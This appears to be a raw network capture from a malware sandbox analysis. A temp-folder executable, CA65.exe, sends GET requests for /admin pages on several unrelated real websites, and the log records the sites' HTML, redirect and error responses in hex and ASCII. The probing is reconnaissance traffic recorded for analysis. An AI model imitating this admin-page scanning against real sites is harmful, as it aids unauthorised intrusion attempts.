2023-12-22 20:15:10 UTC	1369	IN	Data Raw: 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 33 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 33 38 22 20 79 31 3d 22 38 31 22 20 78 32 3d 22 33 33 38 22 20 79 32 3d 22 38 35 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 41 33 46 46 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 32 39 46 46 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 34 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 38 37 22 20 79 31 3d 22 31 33 30 22 20 78 32 3d 22 33 38 37 22 20 79 32 3d 22 31 33 34 Data Ascii: rGradient id="paint13_linear" x1="338" y1="81" x2="338" y2="85" gradientUnits="userSpaceOnUse"><stop stop-color="#00A3FF" /><stop offset="1" stop-color="#0029FF" /></linearGradient><linearGradient id="paint14_linear" x1="387" y1="130" x2="387" y2="134
2023-12-22 20:15:10 UTC	1369	IN	Data Raw: 0a 3c 66 65 42 6c 65 6e 64 20 69 6e 32 3d 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 72 65 73 75 6c 74 3d 22 65 66 66 65 63 74 31 5f 64 72 6f 70 53 68 61 64 6f 77 22 20 2f 3e 0a 3c 66 65 42 6c 65 6e 64 20 69 6e 3d 22 53 6f 75 72 63 65 47 72 61 70 68 69 63 22 20 69 6e 32 3d 22 65 66 66 65 63 74 31 5f 64 72 6f 70 53 68 61 64 6f 77 22 20 72 65 73 75 6c 74 3d 22 73 68 61 70 65 22 20 2f 3e 0a 3c 2f 66 69 6c 74 65 72 3e 0a 3c 66 69 6c 74 65 72 20 69 64 3d 22 66 69 6c 74 65 72 31 5f 64 22 20 78 3d 22 33 33 31 2e 37 33 34 22 20 79 3d 22 34 33 22 20 77 69 64 74 68 3d 22 33 36 2e 35 33 31 37 22 20 68 65 69 67 68 74 3d 22 33 35 2e 31 33 35 33 22 20 66 69 6c 74 65 72 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 63 6f 6c 6f Data Ascii: <feBlend in2="BackgroundImageFix" result="effect1_dropShadow" /><feBlend in="SourceGraphic" in2="effect1_dropShadow" result="shape" /></filter><filter id="filter1_d" x="331.734" y="43" width="36.5317" height="35.1353" filterUnits="userSpaceOnUse" colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
292	192.168.2.4	55223	141.193.213.10	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:10 UTC	329	OUT	GET /admin HTTP/1.1 Host: jaydien.com Accept: / Accept-Encoding: deflate, gzip Cookie: __cf_bm=3HhyYTfsX5YRDp4a9hUDOU4FvGovFzj6TOWrYxb25t8-1703276108-1-AdNu1cZ2HgXUxLwkowJ6g+MlOGl60kpAobuKqwPqrrv1WcvQzi/TgmHjoUtdXxaiwHAYo8HKKkVVakEJ1FI2+V8= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:10 UTC	1354	IN	HTTP/1.1 403 Forbidden Date: Fri, 22 Dec 2023 20:15:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Set-Cookie: apbct_timestamp=1703276110; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_site_landing_ts=1703276110; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_page_hits=1; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%25226abce91ea6b8965dfd33f22fbcd48a25%2522%257D; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_urls=%7B%22jaydien.com%2Fadmin%22%3A%5B1703276110%5D%7D; expires=Mon, 25 Dec 2023 20:15:10 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25 Dec 2023 20:15:10 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=Lax Expires: Fri, 01 Jan 71 00:00:00 +0000 Pragma: no-cache X-Powered-By: WP Engine X-Cacheable: NO:403 Cache-Control: max-age=0, must-revalidate, private X-Cache: MISS X-Cache-Group: normal CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 839b090a3d213340-MIA
2023-12-22 20:15:10 UTC	32	IN	Data Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:10 UTC	1352	IN	Data Raw: 31 66 39 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 70 72 69 76 61 74 65 22 3e Data Ascii: 1f92<!DOCTYPE html><html lang='en'><head><meta charset='utf-8' /><meta name='viewport' content='width=device-width, initial-scale=1' /><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="cache-control" content="private">
2023-12-22 20:15:10 UTC	1369	IN	Data Raw: 6b 2d 62 6f 75 6e 63 65 64 65 6c 61 79 20 31 2e 34 73 20 69 6e 66 69 6e 69 74 65 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 62 6f 74 68 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 6b 2d 62 6f 75 6e 63 65 64 65 6c 61 79 20 31 2e 34 73 20 69 6e 66 69 6e 69 74 65 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 62 6f 74 68 3b 0a 09 09 7d 0a 0a 09 09 2e 73 70 69 6e 6e 65 72 20 2e 62 6f 75 6e 63 65 31 20 7b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 32 73 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 32 73 3b 0a 09 09 7d 0a 0a 09 09 2e 73 70 69 6e 6e 65 72 20 2e 62 6f 75 6e 63 65 32 20 7b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 Data Ascii: k-bouncedelay 1.4s infinite ease-in-out both;animation: sk-bouncedelay 1.4s infinite ease-in-out both;}.spinner .bounce1 {-webkit-animation-delay: -0.32s;animation-delay: -0.32s;}.spinner .bounce2 {-webkit-animation-delay: -0
2023-12-22 20:15:10 UTC	1369	IN	Data Raw: 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 37 33 61 61 3b 0a 09 09 7d 0a 09 09 61 3a 68 6f 76 65 72 2c 0a 09 09 61 3a 61 63 74 69 76 65 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 36 37 39 39 3b 0a 09 09 7d 0a 09 09 61 3a 66 6f 63 75 73 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 31 32 34 39 36 34 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 0a 09 09 09 09 09 30 20 30 20 30 20 31 70 78 20 23 35 62 39 64 64 39 2c 0a 09 09 09 09 09 30 20 30 20 32 70 78 20 31 70 78 20 72 67 62 61 28 33 30 2c 20 31 34 30 2c 20 31 39 30 2c 20 30 2e 38 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 0a Data Ascii: rgin-bottom: 10px;font-size: 14px ;}a {color: #0073aa;}a:hover,a:active {color: #006799;}a:focus {color: #124964;-webkit-box-shadow:0 0 0 1px #5b9dd9,0 0 2px 1px rgba(30, 140, 190, 0.8);box-shadow:
2023-12-22 20:15:10 UTC	1369	IN	Data Raw: 3d 27 68 74 74 70 73 3a 2f 2f 6a 61 79 64 69 65 6e 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 3e 0a 09 09 76 61 72 20 63 74 50 75 62 6c 69 63 46 75 6e 63 74 69 6f 6e 73 20 3d 20 7b 22 5f 61 6a 61 78 5f 6e 6f 6e 63 65 22 3a 22 30 65 36 66 31 30 39 34 63 66 22 2c 22 5f 72 65 73 74 5f 6e 6f 6e 63 65 22 3a 22 34 39 66 38 64 38 64 62 32 31 22 2c 22 5f 61 6a 61 78 5f 75 72 6c 22 3a 22 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 2c 22 5f 72 65 73 74 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6a 61 79 64 69 65 6e 2e 63 6f 6d 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 22 2c 22 64 61 74 61 5f 5f Data Ascii: ='https://jaydien.com/wp-includes/js/jquery/jquery.min.js'></script><script>var ctPublicFunctions = {"_ajax_nonce":"0e6f1094cf","_rest_nonce":"49f8d8db21","_ajax_url":"\/wp-admin\/admin-ajax.php","_rest_url":"https:\/\/jaydien.com\/wp-json\/","data__
2023-12-22 20:15:10 UTC	1369	IN	Data Raw: 65 2c 20 70 6c 65 61 73 65 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 65 6e 61 62 6c 65 64 20 4a 61 76 61 53 63 72 69 70 74 2e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 27 6a 73 5f 70 61 73 73 65 64 27 3e 0a 09 09 09 3c 68 33 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 74 68 65 20 6c 69 6e 6b 20 62 65 6c 6f 77 20 74 6f 20 70 61 73 73 20 74 68 65 20 70 72 6f 74 65 63 74 69 6f 6e 2c 3c 2f 68 33 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 27 2f 61 64 6d 69 6e 27 3e 3c 73 63 72 69 70 74 3e 67 65 74 5f 63 75 72 72 65 6e 74 5f 75 72 6c 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 61 3e 0a 09 09 09 3c 62 72 20 2f 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 27 6a 73 5f 6e 6f 74 69 63 65 27 3e 4f 72 20 79 6f 75 20 Data Ascii: e, please make sure that you have enabled JavaScript.</div> <div id='js_passed'><h3>Please click the link below to pass the protection,</h3><a href='/admin'><script>get_current_url();</script></a><br /><p class='js_notice'>Or you
2023-12-22 20:15:10 UTC	1262	IN	Data Raw: 09 5b 27 63 74 5f 73 66 77 5f 70 61 73 73 5f 6b 65 79 27 2c 20 65 73 63 61 70 65 28 27 61 62 36 33 34 33 39 62 33 32 62 30 61 31 65 38 34 34 65 35 61 62 36 64 36 66 34 65 32 35 35 39 30 27 29 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 2c 0a 09 09 09 09 5b 27 77 6f 72 64 70 72 65 73 73 5f 61 70 62 63 74 5f 61 6e 74 69 62 6f 74 27 2c 20 65 73 63 61 70 65 28 27 34 31 36 62 31 38 63 66 62 62 34 66 32 33 61 33 34 32 30 35 37 66 33 66 35 37 31 61 30 33 32 31 33 36 33 38 34 33 31 61 34 39 31 34 65 31 62 37 63 61 64 63 64 37 38 63 31 61 32 63 62 36 63 36 27 29 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 2c 0a 09 09 09 09 5b 27 63 74 5f 73 66 77 5f 70 61 73 73 65 64 27 2c 20 27 31 27 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 Data Ascii: ['ct_sfw_pass_key', escape('ab63439b32b0a1e844e5ab6d6f4e25590'), date.toUTCString()],['wordpress_apbct_antibot', escape('416b18cfbb4f23a342057f3f571a03213638431a4914e1b7cadcd78c1a2cb6c6'), date.toUTCString()],['ct_sfw_passed', '1', date.toUTCSt
2023-12-22 20:15:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
293	192.168.2.4	55225	52.165.155.237	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:10 UTC	261	OUT	GET /admin HTTP/1.1 Host: intermountainmls.com Accept: / Accept-Encoding: deflate, gzip Cookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:10 UTC	162	IN	HTTP/1.1 200 OK Content-Length: 2174 Connection: close Content-Type: text/html Date: Fri, 22 Dec 2023 20:15:10 GMT Server: Kestrel X-Powered-By: ASP.NET
2023-12-22 20:15:10 UTC	1277	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 42 4d 42 58 58 44 4a 59 31 48 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 20 7b 20 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b Data Ascii: <!DOCTYPE html><html lang="en"><head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-BMBXXDJY1H"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag() { dataLayer.push(arguments);
2023-12-22 20:15:10 UTC	897	IN	Data Raw: 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 69 6e 69 74 5f 73 74 61 74 65 20 3d 20 27 27 3b 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 28 6c 2c 20 69 2c 20 73 2c 20 74 2c 20 68 2c 20 75 2c 20 62 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 5b 27 4c 69 73 74 48 75 62 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 20 3d 20 68 3b 20 6c 5b 68 Data Ascii: mages/favicon.ico"></head><body> <script type="text/javascript"> window.init_state = ''; </script> <script type="text/javascript"> (function (l, i, s, t, h, u, b) { l['ListHubAnalyticsObject'] = h; l[h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
294	192.168.2.4	55579	104.21.52.80	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:10 UTC	169	OUT	GET /admin HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:11 UTC	1044	IN	HTTP/1.1 302 Found Date: Fri, 22 Dec 2023 20:15:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://cannaclear.com/wp-admin/ CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: no-cache, must-revalidate, max-age=0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Link: <https://cannaclear.com/wp-json/>; rel="https://api.w.org/" Vary: X-Forwarded-Proto,Accept-Encoding x-redirect-by: WordPress Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XMAR9pYzaPYc8joeg4kUs379e%2FRdNeFKKr4ujpIhmlMvYT4dnWPcEi%2Bf7Y8zhDA2972uDAagMQ42%2Bavm5ghOBHVsV7O9BUpUjKYGFOktv79w4h%2BUonqYjCZdWPOWgLSmqQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b090c19fc3715-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
295	192.168.2.4	55440	34.206.39.153	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:10 UTC	204	OUT	GET /admin HTTP/1.1 Host: aldine.org.com Accept: / Accept-Encoding: deflate, gzip Cookie: SERVERID=vpc4\|ZYXxK\|ZYXxK User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:10 UTC	535	IN	HTTP/1.1 302 Found Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Dec 2023 20:15:10 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none Referrer-Policy: strict-origin-when-cross-origin Location: https://aldine.org.com/admin/login Cache-Control: no-cache X-Request-Id: fd8ce272-bc92-40e5-9a09-20383fe06314 X-Runtime: 0.010806
2023-12-22 20:15:10 UTC	111	IN	Data Raw: 36 34 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 64 69 6e 65 2e 6f 72 67 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 6c 6f 67 69 6e 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 64<html><body>You are being <a href="https://aldine.org.com/admin/login">redirected</a>.</body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
296	192.168.2.4	55713	104.24.82.4	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:10 UTC	177	OUT	GET /admin.php HTTP/1.1 Host: www.thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:10 UTC	666	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: private, no-store x-request-id: 701c518c-f570-4e12-bac9-abf8ce81a6b8 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=C08DiDONiOZRrQs2xVCdR%2FujNSl7FfVrkhs7MJRixQX1vRMi%2FsHl2RRQzfW3Ww1ZBpS5%2BGLV97%2FaIhFSQLTtqPfcwvZy%2Fs0zWZGE2kCksHJrgP%2Behen131eDxDa0lcRDWGiJag%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b090c8ca76dad-MIA
2023-12-22 20:15:10 UTC	703	IN	Data Raw: 31 32 30 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 77 69 6e 64 6f 77 2e 41 70 70 56 65 72 73 69 6f 6e 20 3d 20 22 63 68 61 6e 67 65 2d 6d 65 72 67 65 64 2d 6d 61 73 74 65 72 2d 31 36 39 38 38 2d 31 2d 39 36 33 22 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 41 70 70 55 72 6c 20 3d 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 22 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 53 69 74 65 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 3d 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 53 69 74 65 47 72 6f 75 70 20 3d 20 22 74 68 65 6e 69 6c Data Ascii: 1202<!doctype html><html class="no-js" lang="en"><head><script> window.AppVersion = "change-merged-master-16988-1-963"; window.AppUrl = "https:\/\/www.thenile.com.au"; window.SiteEnvironment = "production"; window.SiteGroup = "thenil
2023-12-22 20:15:10 UTC	1369	IN	Data Raw: 20 20 20 20 20 6b 65 79 3a 20 22 35 65 38 36 30 66 33 35 61 37 63 38 39 34 34 32 30 33 39 37 38 64 62 37 32 63 65 36 36 39 31 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 72 65 72 65 6e 64 65 72 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 6e 64 65 72 69 6e 67 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 6d 61 69 6e 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 22 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 75 73 65 72 54 6f 6b 65 6e 3a 20 22 22 2c 0a 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 41 75 74 68 20 3d 20 66 61 6c 73 65 3b 0a 20 20 20 20 Data Ascii: key: "5e860f35a7c8944203978db72ce66913", prerender: { rendering: false, domain: "https:\/\/www.thenile.com.au" }, userToken: "", }; window.Auth = false;
2023-12-22 20:15:10 UTC	1369	IN	Data Raw: 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 57 68 6f 6f 70 73 2e 2e 2e 20 74 68 61 74 20 70 61 67 65 20 64 6f 65 73 6e e2 80 99 74 20 65 78 69 73 74 2e 20 34 30 34 20 45 72 72 6f 72 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 69 6d 61 67 65 73 2e 74 68 65 6e 69 6c 65 2e 69 6f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 Data Ascii: meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title> Whoops... that page doesnt exist. 404 Error. </title><link rel="preconnect" href="//images.thenile.io"><link rel="pre
2023-12-22 20:15:10 UTC	1177	IN	Data Raw: 64 73 20 61 72 65 20 61 74 20 54 68 65 4e 69 6c 65 2e 63 6f 6d 2e 61 75 20 77 69 74 68 20 46 72 65 65 20 33 30 20 44 61 79 20 52 65 74 75 72 6e 73 21 22 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6a 73 2e 73 74 72 69 70 65 2e 63 6f 6d 2f 76 33 2f 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 6e 67 2d 61 70 70 3d 22 74 6e 41 70 70 22 20 6e 67 2d 63 6f 6e 74 72 6f 6c 6c 65 72 3d 22 43 6f 6d 6d 61 6e 64 42 75 73 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 6e 2d 68 65 61 64 65 72 20 63 6f 6c 6c 61 70 73 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6d 61 6c 6c 2d 33 20 6d 65 64 69 75 6d 2d 33 20 63 6f 6c 75 6d 6e 73 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 74 65 67 6f 72 Data Ascii: ds are at TheNile.com.au with Free 30 Day Returns!"><script src="https://js.stripe.com/v3/"></script></head><body ng-app="tnApp" ng-controller="CommandBus"><div class="row tn-header collapse"><div class="small-3 medium-3 columns"><div class="categor
2023-12-22 20:15:10 UTC	1369	IN	Data Raw: 34 33 31 37 0d 0a 0a 3c 70 61 74 68 20 64 3d 22 4d 31 38 30 20 31 37 35 56 37 35 6c 38 30 20 36 35 6d 30 2d 36 35 76 31 30 30 6d 39 30 2d 31 30 30 76 31 30 30 6d 38 30 2d 31 30 30 76 31 30 30 68 36 35 6d 31 33 35 20 30 68 2d 36 30 56 37 35 68 36 30 6d 2d 36 30 20 35 30 68 35 30 22 20 73 74 72 6f 6b 65 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 31 30 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 20 2f 3e 0a 3c 70 61 74 68 20 73 74 72 6f 6b 65 3d 22 23 42 36 38 32 35 37 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 31 30 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 